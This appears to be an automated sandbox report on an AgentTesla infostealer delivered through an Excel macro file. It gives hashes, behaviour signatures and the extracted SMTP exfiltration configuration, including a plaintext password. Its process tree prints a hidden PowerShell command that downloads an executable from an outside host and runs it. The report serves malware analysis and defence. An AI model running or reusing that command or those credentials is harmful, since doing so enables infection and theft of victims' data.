Analysis
- max time kernel: 118s
- max time network: 126s
- platform: windows10-2004_x64
- resource: win10v2004-20230220-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 15-03-2023 02:30
Behavioral task: behavioral1
- Sample: pnlfui.xlsm
- Resource: win7-20230220-en
Behavioral task: behavioral2
- Sample: pnlfui.xlsm
- Resource: win10v2004-20230220-en
General
- Target: pnlfui.xlsm
- Size: 430KB
- MD5: 4b222ff63ba4a27646751b5dadfd3ed7
- SHA1: 4786533018798fbbb3083910b2459a80b3e60258
- SHA256: 37eb0640c85ef74c91b533f1fc7cc1ac9584d648330e105fb37b4231f885576c
- SHA512: acbfccde01fde8e1ea84d5b7bca67774275f19c5ad4f4b23da340fec651f92998cbbb12937aefd82f9c13d97bb4d3574bf49ad4918d4aebd3f3403266ea7f4a6
- SSDEEP: 12288:HfMXQu7SHOCZhSTIS2dGpeWpqivD1YxR25O8UA:HNwarmMSAGMID1R5OtA
Malware Config
Extracted family: agenttesla
- Protocol: smtp
- Host: sqsendy.shop
- Port: 587
- Username: [email protected]
- Password: I^l1gJFLlu#v
- Email To: [email protected]
Signatures
- AgentTesla
  Agent Tesla is a remote access tool (RAT) written in Visual Basic.
- Process spawned unexpected child process (1 IoCs)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes: powershell.exe
    description | pid | pid_target | process | target process
    Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 864 | 4560 | powershell.exe | EXCEL.EXE
- Blocklisted process makes network request (1 IoCs)
  Processes: powershell.exe
    flow | pid | process
    35 | 864 | powershell.exe
- Downloads MZ/PE file
- Executes dropped EXE (1 IoCs)
  Processes: tmpA5E9.exe
    pid | process
    3004 | tmpA5E9.exe
- Reads data files stored by FTP clients (2 TTPs)
  Tries to access configuration files associated with programs like FileZilla.
- Reads user/profile data of local email clients (2 TTPs)
  Email clients store some user data on disk where infostealers will often target it.
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Accesses Microsoft Outlook profiles (1 TTPs, 3 IoCs)
  Processes: RegAsm.exe
    description | ioc | process
    Key opened | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | RegAsm.exe
    Key opened | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | RegAsm.exe
    Key opened | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | RegAsm.exe
- Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes:
    flow | ioc
    49 | api.ipify.org
    48 | api.ipify.org
- Suspicious use of SetThreadContext (1 IoCs)
  Processes: tmpA5E9.exe
    description | pid | process | target process
    PID 3004 set thread context of 4352 | 3004 | tmpA5E9.exe | RegAsm.exe
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes: EXCEL.EXE
    description | ioc | process
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes: EXCEL.EXE
    description | ioc | process
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE
- Suspicious behavior: AddClipboardFormatListener (1 IoCs)
  Processes: EXCEL.EXE
    pid | process
    4560 | EXCEL.EXE
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes: powershell.exe, tmpA5E9.exe
    pid | process
    864 | powershell.exe (2 entries)
    3004 | tmpA5E9.exe (2 entries)
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes: powershell.exe, tmpA5E9.exe, RegAsm.exe
    description | pid | process
    Token: SeDebugPrivilege | 864 | powershell.exe
    Token: SeDebugPrivilege | 3004 | tmpA5E9.exe
    Token: SeDebugPrivilege | 4352 | RegAsm.exe
- Suspicious use of FindShellTrayWindow (2 IoCs)
  Processes: EXCEL.EXE
    pid | process
    4560 | EXCEL.EXE (2 entries)
- Suspicious use of SetWindowsHookEx (12 IoCs)
  Processes: EXCEL.EXE
    pid | process
    4560 | EXCEL.EXE (12 entries)
- Suspicious use of WriteProcessMemory (15 IoCs)
  Processes: EXCEL.EXE, powershell.exe, tmpA5E9.exe
    description | pid | process | target process
    PID 4560 wrote to memory of 864 | 4560 | EXCEL.EXE | powershell.exe (2 entries)
    PID 864 wrote to memory of 3004 | 864 | powershell.exe | tmpA5E9.exe (2 entries)
    PID 3004 wrote to memory of 448 | 3004 | tmpA5E9.exe | RegAsm.exe (3 entries)
    PID 3004 wrote to memory of 4352 | 3004 | tmpA5E9.exe | RegAsm.exe (8 entries)
- outlook_office_path (1 IoCs)
  Processes: RegAsm.exe
    description | ioc | process
    Key opened | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | RegAsm.exe
- outlook_win_path (1 IoCs)
  Processes: RegAsm.exe
    description | ioc | process
    Key opened | \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | RegAsm.exe
Processes
- (depth 1) C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\pnlfui.xlsm"
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
- (depth 2) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } –PassThru; Invoke-WebRequest -Uri "http://lostheaven.com.cn/wp-includes/BL-1600072563308pdf.exe" -OutFile $TempFile; Start-Process $TempFile;
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
- (depth 3) C:\Users\Admin\AppData\Local\Temp\tmpA5E9.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\tmpA5E9.exe"
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
- (depth 4) C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
- (depth 4) C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  - Accesses Microsoft Outlook profiles
  - Suspicious use of AdjustPrivilegeToken
  - outlook_office_path
  - outlook_win_path
Downloads
- C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q2yjwfy2.the.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- C:\Users\Admin\AppData\Local\Temp\tmpA5E9.exe
  Filesize: 1.1MB
  MD5: 439d761548b85536d63cd8e4a8d26d8f
  SHA1: 67c92467dc3394d628a4f43b6950d7b340a052b5
  SHA256: 5b178b34f935328b391d2aaf55c074d8560f09f22035f11309c659c4df2a1292
  SHA512: 2a33a49dd93dd9a7822e2677e076f82f3e2fa33532012fe95605baba9ad2681e146ebec9f225778d25012f3efadfbba9b86321d23ee8572940cd3aff9304b8a3
Memory dumps
- memory/864-149-0x00000219F8490000-0x00000219F84A0000-memory.dmp: 64KB
- memory/864-160-0x00000219F8490000-0x00000219F84A0000-memory.dmp: 64KB
- memory/864-155-0x00000219F8440000-0x00000219F8462000-memory.dmp: 136KB
- memory/864-148-0x00000219F8490000-0x00000219F84A0000-memory.dmp: 64KB
- memory/3004-179-0x00000000003D0000-0x00000000004EE000-memory.dmp: 1.1MB
- memory/3004-180-0x000000001B110000-0x000000001B120000-memory.dmp: 64KB
- memory/4352-184-0x0000000005F50000-0x00000000064F4000-memory.dmp: 5.6MB
- memory/4352-197-0x0000000005B30000-0x0000000005B40000-memory.dmp: 64KB
- memory/4352-193-0x00000000075B0000-0x0000000007772000-memory.dmp: 1.8MB
- memory/4352-192-0x0000000007290000-0x00000000072E0000-memory.dmp: 320KB
- memory/4352-191-0x0000000007110000-0x000000000711A000-memory.dmp: 40KB
- memory/4352-190-0x0000000007150000-0x00000000071E2000-memory.dmp: 584KB
- memory/4352-189-0x0000000005B30000-0x0000000005B40000-memory.dmp: 64KB
- memory/4352-188-0x00000000059A0000-0x0000000005A06000-memory.dmp: 408KB
- memory/4352-181-0x0000000000400000-0x0000000000430000-memory.dmp: 192KB
- memory/4560-135-0x00007FFF193D0000-0x00007FFF193E0000-memory.dmp: 64KB
- memory/4560-138-0x00007FFF16B00000-0x00007FFF16B10000-memory.dmp: 64KB
- memory/4560-139-0x00007FFF16B00000-0x00007FFF16B10000-memory.dmp: 64KB
- memory/4560-134-0x00007FFF193D0000-0x00007FFF193E0000-memory.dmp: 64KB
- memory/4560-136-0x00007FFF193D0000-0x00007FFF193E0000-memory.dmp: 64KB
- memory/4560-165-0x00000237ECEE0000-0x00000237ED089000-memory.dmp: 1.7MB
- memory/4560-137-0x00007FFF193D0000-0x00007FFF193E0000-memory.dmp: 64KB
- memory/4560-133-0x00007FFF193D0000-0x00007FFF193E0000-memory.dmp: 64KB
- memory/4560-209-0x00000237ECEE0000-0x00000237ED089000-memory.dmp: 1.7MB
- memory/4560-213-0x00007FFF193D0000-0x00007FFF193E0000-memory.dmp: 64KB
- memory/4560-214-0x00007FFF193D0000-0x00007FFF193E0000-memory.dmp: 64KB
- memory/4560-215-0x00007FFF193D0000-0x00007FFF193E0000-memory.dmp: 64KB
- memory/4560-216-0x00007FFF193D0000-0x00007FFF193E0000-memory.dmp: 64KB
- memory/4560-217-0x00000237ECEE0000-0x00000237ED089000-memory.dmp: 1.7MB